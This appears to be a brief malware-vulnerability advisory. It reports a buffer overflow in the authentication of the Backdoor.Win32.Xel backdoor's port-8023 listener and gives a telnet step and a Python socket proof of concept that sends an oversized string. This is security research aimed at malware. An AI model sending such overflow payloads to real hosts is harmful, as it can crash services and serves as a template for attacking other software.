Backdoor.Win32.Xel Remote Authentication Buffer Overflow
Backdoor.Win32.Xel malware suffers from a remote authentication-related buffer overflow vulnerability.
Exploit/PoC-1:

TELNET x.x.x.x 8023
Enter a long string for password.

Exploit/PoC-2:

from socket import *

MALWARE_HOST="x.x.x.x"
PORT=8023

def doit():
    s=socket(AF_INET, SOCK_STREAM)
    s.connect((MALWARE_HOST, PORT))

    # 200 "A" characters followed by HTTP-style request text
    PBARBAR="A"*200+" HTTP/1.1\r\nHost: "+MALWARE_HOST+"\r\n\r\n"
    s.send(PBARBAR.encode())  # sockets require bytes on Python 3
    s.close()

    print("Backdoor.Win32.Xel / Remote Authentication Buffer Overflow")
    print("MD5: 3648c68bfe395fb9980ae547d881572c")
    print("By Malvuln")

if __name__=="__main__":
    doit()